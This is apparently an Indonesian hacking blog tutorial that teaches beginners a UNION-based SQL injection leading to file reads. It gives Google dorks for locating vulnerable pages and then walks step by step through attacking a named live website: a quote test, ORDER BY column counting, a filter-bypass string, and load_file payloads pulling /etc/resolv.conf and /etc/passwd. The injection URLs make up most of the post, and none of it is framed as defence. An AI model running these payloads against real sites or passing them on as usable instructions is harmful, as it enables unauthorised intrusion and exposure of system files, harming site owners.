SQLI to LFI (Easy bagi pemula)
Assalamu'alaikum KERR..
soloyo wacapp gess, balik lagi dengan gua NzXsx7
yukk kita mulai belajarnya
kali ini gua mau kasih tutorial tentang SQLI to LFI untuk pemula
Pertama-tama kita sediakan Dork dan Payload nya
Dork?
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
Berhubung kita buat yang double LFI,
Kita kasih dua payload
Payload 1
load_file(%27/etc/resolv.conf')
Payload 2
load_file('/etc/passwd')
karena males ngedork disini gua pake live target
Live target
http://corrugated.co.id/product_detail.php?id=3
kita salin
masuk ke google crome/browser kelen masing-masing
Di belakang paramenter kita kasih tanda (') guna kita tau web vuln atau tidak.
Contoh :
http://corrugated.co.id/product_detail.php?id=3%27
Jika eror seperti ini, dia vuln dan kita bisa kerjain ini web
Jika vuln, langsung saja kita tambahin
+order+by+1--+-
gunanya? Kita mencari bug nya di angka berapa.
Contoh
http://corrugated.co.id/product_detail.php?id=3%27+order+by+1--+-
Jika di angka satu dia masih normal, kita tambahin ke angka dua
Contoh
http://corrugated.co.id/product_detail.php?id=3%27+order+by+2--+-
Jika belm eror juga, kita tambahin terus sampai dia ketemu eror nya.
Berhubung diangka 2 belum eror, kita langsung ke angka 9
Contoh
http://corrugated.co.id/product_detail.php?id=3%27+order+by+9--+-
Nah, diangka 9 dia eror, kita kurangi ke angka 8.
Alhasil angka 8 dia normal. Dan angka sembilan adalah angka eror/bug nya.
Langsung saja kita tambahin
+Union+select+1,2,3,4,5,6,7,8--+-
Contoh :
http://corrugated.co.id/product_detail.php?id=3%27+union+select+1,2,3,4,5,6,7,8--+-
Gunanya untuk mencari angka ajaib nya gaess,
Berhubung Union select ini eror,
Maka kita kasih kode bypass saja.
%20and%200%20union%20select%20
Contoh :
http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,7,8--+-
Nah, dia ketemu angka ajaib nya. Angka 7 dan angka 8
Lanjut,
Kita masukkan payload pertama di angka 7
Contoh.
http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,load_file(%27/etc/resolv.conf'),8--+-
Di sana ada dua angka ajaib angka7 dan 8. Berhubung angka 7 sudah kita masukkan payload, kita lanjut ke angka 8 kita kasih payload kedua.
Contoh ;
http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,load_file(%27/etc/resolv.conf'),load_file('/etc/passwd')--+-
Nah, done.. Kedua payload sukses di masukkan.
Jadi materi ini tentang double LFI ya gais,
Biar keliatan keren?
Boleh saja kita cetak nama/nick kita di angka 7 tadi.
Caranya? Aku akan kasih di next materi,
okk see youu next time
Terimakasih
Assalamu'alaikum.
Thanks for my friend
and you!!!
Posting Komentar untuk "SQLI to LFI (Easy bagi pemula)"